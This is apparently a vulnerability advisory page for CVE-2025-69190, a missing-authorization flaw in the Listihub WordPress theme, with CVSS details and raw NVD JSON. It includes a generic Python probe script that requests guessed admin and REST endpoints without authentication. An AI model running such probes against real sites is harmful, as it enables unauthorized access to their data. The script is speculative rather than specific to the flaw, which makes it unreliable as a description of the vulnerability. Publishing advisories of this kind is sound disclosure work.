Security Vulnerability Report
中文
CVE-2025-69190 CVSS 7.3 HIGH

CVE-2025-69190

Published: 2026-01-22 17:16:26
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins Listihub listihub allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Listihub: from n/a through <= 1.0.6.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Listihub Theme <= 1.0.6
Listihub Theme (all versions from n/a to 1.0.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-69190 PoC - Missing Authorization in Listihub Theme # Target: WordPress site with Listihub Theme <= 1.0.6 target_url = "http://target-site.com" # The vulnerability allows unauthorized access to protected endpoints # Example: Accessing admin functionality without authentication endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/listihub/v1/settings", "/wp-json/listihub/v1/users", "/wp-content/themes/listihub/includes/api/" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/json" } print("Testing CVE-2025-69190 - Listihub Broken Access Control") print("=" * 60) for endpoint in endpoints: url = target_url + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"\nEndpoint: {endpoint}") print(f"Status Code: {response.status_code}") print(f"Response Length: {len(response.text)}") if response.status_code == 200: print("[!] Potential vulnerability - accessible without authentication") print(f"Response Preview: {response.text[:500]}") except requests.exceptions.RequestException as e: print(f"Error accessing {endpoint}: {e}") print("\n" + "=" * 60) print("Note: This PoC demonstrates potential unauthorized access.") print("Actual exploitation depends on specific endpoint implementations.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69190", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:25.883", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins Listihub listihub allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Listihub: from n/a through <= 1.0.6."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en e-plugins Listihub listihub permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Listihub: desde n/a hasta &lt;= 1.0.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/listihub/vulnerability/wordpress-listihub-theme-1-0-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}